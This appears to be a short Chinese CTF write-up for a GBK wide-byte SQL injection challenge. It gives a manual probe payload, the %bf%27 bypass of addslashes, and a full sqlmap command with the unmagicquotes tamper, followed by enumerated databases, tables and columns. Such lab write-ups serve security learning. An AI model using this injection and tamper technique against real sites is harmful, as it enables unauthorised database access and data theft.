http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
点进去就两句话,这么单调就先让我们看看html
好了。。。什么都没有
仔细一看,发现只有url里面可以注入了
随手一个 1'and'1'='1 上去
问题已经出来了哈,引号变成反斜杠了
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
其实从连接上也能看出来是 SQL-GBK了
sqlmap走一趟
这个时侯就要用另一个脚本了
脚本名:unmagicquotes.py
作用:宽字符绕过 GPC addslashes12345
Example:* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20
sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs
结果
available databases [2]:
[*] `sae-chinalover`
[*] information_schema
我们选择`sae-chinalover`
继续跑,相比于第一次,这次明显快很多
Database: sae-chinalover [5 tables]
+------+
| ctf |
| ctf2 |
| ctf3 |
| ctf4 |
| news |
+------+
很明显了,答案就在这几个里面
sqlmap跑
Database: sae-chinalover
Table: ctf2
[2 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| content | non-numeric |
| id | numeric |
+---------+-------------+
别问我为什么跑ctf2,因为我已经跑完了。。
完了
服务器打不开了。。。。
不是封了我ip就是崩了
在注入题中,先手工一下,探探waf基本过滤规则,然后自行判断